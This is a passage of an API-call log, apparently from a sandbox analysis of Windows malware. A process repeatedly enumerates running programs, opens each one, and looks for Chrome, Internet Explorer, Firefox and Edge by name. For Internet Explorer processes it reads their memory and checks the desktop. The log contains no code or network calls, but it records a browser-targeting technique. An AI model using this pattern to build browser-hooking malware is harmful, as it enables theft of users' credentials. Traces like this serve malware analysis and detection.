	[0223.151] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xad0) returned 0x5628
	[0223.151] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.151] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="chrome.exe") returned 0x0
	[0223.152] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.152] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="iexplore.exe") returned 0x0
	[0223.152] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.152] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="firefox.exe") returned 0x0
	[0223.153] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.153] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0223.153] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reno.exe")) returned 1
	[0223.154] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xae0) returned 0x562c
	[0223.154] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.154] StrStrIA (lpFirst="reno.exe", lpSrch="chrome.exe") returned 0x0
	[0223.155] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.155] StrStrIA (lpFirst="reno.exe", lpSrch="iexplore.exe") returned 0x0
	[0223.155] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.155] StrStrIA (lpFirst="reno.exe", lpSrch="firefox.exe") returned 0x0
	[0223.155] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.155] StrStrIA (lpFirst="reno.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0223.155] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="specreformwear.exe")) returned 1
	[0223.156] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaf0) returned 0x5630
	[0223.156] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.156] StrStrIA (lpFirst="specreformwear.exe", lpSrch="chrome.exe") returned 0x0
	[0223.157] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.157] StrStrIA (lpFirst="specreformwear.exe", lpSrch="iexplore.exe") returned 0x0
	[0223.157] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.157] StrStrIA (lpFirst="specreformwear.exe", lpSrch="firefox.exe") returned 0x0
	[0223.158] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.158] StrStrIA (lpFirst="specreformwear.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0223.158] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rr_publications.exe")) returned 1
	[0223.165] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb00) returned 0x5634
	[0223.165] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.165] StrStrIA (lpFirst="rr_publications.exe", lpSrch="chrome.exe") returned 0x0
	[0223.165] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.165] StrStrIA (lpFirst="rr_publications.exe", lpSrch="iexplore.exe") returned 0x0
	[0223.166] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.166] StrStrIA (lpFirst="rr_publications.exe", lpSrch="firefox.exe") returned 0x0
	[0223.166] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.166] StrStrIA (lpFirst="rr_publications.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0223.167] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="solo.exe")) returned 1
	[0223.167] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb10) returned 0x5638
	[0223.167] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.167] StrStrIA (lpFirst="solo.exe", lpSrch="chrome.exe") returned 0x0
	[0223.168] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.168] StrStrIA (lpFirst="solo.exe", lpSrch="iexplore.exe") returned 0x0
	[0223.168] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.168] StrStrIA (lpFirst="solo.exe", lpSrch="firefox.exe") returned 0x0
	[0223.168] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.168] StrStrIA (lpFirst="solo.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0223.169] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beam.exe")) returned 1
	[0223.169] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb20) returned 0x563c
	[0223.169] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.169] StrStrIA (lpFirst="beam.exe", lpSrch="chrome.exe") returned 0x0
	[0223.170] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.170] StrStrIA (lpFirst="beam.exe", lpSrch="iexplore.exe") returned 0x0
	[0223.170] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.170] StrStrIA (lpFirst="beam.exe", lpSrch="firefox.exe") returned 0x0
	[0223.170] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.170] StrStrIA (lpFirst="beam.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0223.170] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="configurations.exe")) returned 1
	[0223.171] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb30) returned 0x5640
	[0223.171] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.171] StrStrIA (lpFirst="configurations.exe", lpSrch="chrome.exe") returned 0x0
	[0223.172] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.172] StrStrIA (lpFirst="configurations.exe", lpSrch="iexplore.exe") returned 0x0
	[0223.172] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.172] StrStrIA (lpFirst="configurations.exe", lpSrch="firefox.exe") returned 0x0
	[0223.173] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.173] StrStrIA (lpFirst="configurations.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0223.173] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact-film-anticipated.exe")) returned 1
	[0223.174] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb40) returned 0x5644
	[0223.174] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.175] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="chrome.exe") returned 0x0
	[0223.175] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.175] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="iexplore.exe") returned 0x0
	[0223.176] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.176] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="firefox.exe") returned 0x0
	[0223.177] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.177] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0223.177] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wanting villages.exe")) returned 1
	[0223.178] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb50) returned 0x5648
	[0223.178] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.178] StrStrIA (lpFirst="wanting villages.exe", lpSrch="chrome.exe") returned 0x0
	[0223.178] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.178] StrStrIA (lpFirst="wanting villages.exe", lpSrch="iexplore.exe") returned 0x0
	[0223.179] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.179] StrStrIA (lpFirst="wanting villages.exe", lpSrch="firefox.exe") returned 0x0
	[0223.179] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.179] StrStrIA (lpFirst="wanting villages.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0223.180] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="engagementresearchersmonkey.exe")) returned 1
	[0223.181] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb60) returned 0x564c
	[0223.181] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.181] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="chrome.exe") returned 0x0
	[0223.181] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.181] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="iexplore.exe") returned 0x0
	[0223.182] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.182] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="firefox.exe") returned 0x0
	[0223.183] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.183] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0223.183] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="surgical-marcus.exe")) returned 1
	[0223.184] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb70) returned 0x5650
	[0223.184] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.184] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="chrome.exe") returned 0x0
	[0223.185] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.185] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="iexplore.exe") returned 0x0
	[0223.185] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.185] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="firefox.exe") returned 0x0
	[0223.186] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.186] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0223.186] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0223.187] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc38) returned 0x5654
	[0223.187] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.187] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0223.187] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.187] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0223.187] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.187] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0223.188] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.188] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0223.188] NtQueryInformationProcess (in: ProcessHandle=0x5654, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0223.188] ReadProcessMemory (in: hProcess=0x5654, lpBaseAddress=0x7ffdb000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0223.188] ReadProcessMemory (in: hProcess=0x5654, lpBaseAddress=0x2b11c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0223.188] ReadProcessMemory (in: hProcess=0x5654, lpBaseAddress=0x2b1998, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0223.189] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0223.189] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0xc38, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0223.189] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc94) returned 0x5658
	[0223.190] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.190] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0223.190] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.191] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0223.191] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.191] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0223.191] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.191] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0223.191] NtQueryInformationProcess (in: ProcessHandle=0x5658, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0223.191] ReadProcessMemory (in: hProcess=0x5658, lpBaseAddress=0x7ffde000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0223.191] ReadProcessMemory (in: hProcess=0x5658, lpBaseAddress=0x911c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0223.192] ReadProcessMemory (in: hProcess=0x5658, lpBaseAddress=0x919ba, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0223.192] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0223.192] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x914, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x34c, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0223.193] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x914) returned 0x565c
	[0223.193] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.193] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0223.193] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.193] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0223.193] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.193] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0223.194] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.194] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0223.194] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x914, pcPriClassBase=6, dwFlags=0x0, szExeFile="tadiapce.exe")) returned 1
	[0223.195] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x214) returned 0x5660
	[0223.195] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.195] StrStrIA (lpFirst="tadiapce.exe", lpSrch="chrome.exe") returned 0x0
	[0223.195] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.195] StrStrIA (lpFirst="tadiapce.exe", lpSrch="iexplore.exe") returned 0x0
	[0223.196] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.196] StrStrIA (lpFirst="tadiapce.exe", lpSrch="firefox.exe") returned 0x0
	[0223.196] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.196] StrStrIA (lpFirst="tadiapce.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0223.196] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaa8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0223.197] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaa8) returned 0x5664
	[0223.197] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.197] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0223.197] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.197] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0223.198] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.198] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0223.198] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.198] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0223.198] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x110, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0223.199] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0223.200] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x6d8) returned 0x5668
	[0223.200] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.200] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0223.200] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.200] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0223.200] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.201] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0223.201] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.201] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0223.201] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0223.202] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa70) returned 0x566c
	[0223.202] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.202] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0223.202] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.202] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0223.203] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.203] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0223.203] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.203] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0223.203] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0223.204] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc20) returned 0x5670
	[0223.204] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.204] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0223.204] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.204] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0223.205] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.205] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0223.205] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.205] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0223.209] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 0
	[0223.209] CloseHandle (hObject=0x4fd0) returned 1
	[0223.209] Sleep (dwMilliseconds=0x64) 
	[0223.317] GetCurrentProcessId () returned 0x110
	[0223.317] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x4fd0
	[0223.321] Process32First (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0223.322] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0223.323] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0223.324] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x104) returned 0x5674
	[0223.324] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.324] StrStrIA (lpFirst="smss.exe", lpSrch="chrome.exe") returned 0x0
	[0223.324] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.324] StrStrIA (lpFirst="smss.exe", lpSrch="iexplore.exe") returned 0x0
	[0223.324] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.324] StrStrIA (lpFirst="smss.exe", lpSrch="firefox.exe") returned 0x0
	[0223.325] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.325] StrStrIA (lpFirst="smss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0223.325] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0223.326] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x148) returned 0x5678
	[0223.326] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.326] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0223.326] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.326] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0223.326] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.326] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0223.327] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.327] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0223.327] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0223.328] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x178) returned 0x567c
	[0223.328] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.328] StrStrIA (lpFirst="wininit.exe", lpSrch="chrome.exe") returned 0x0
	[0223.328] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0223.328] StrStrIA (lpFirst="wininit.exe", lpSrch="iexplore.exe") returned 0x0
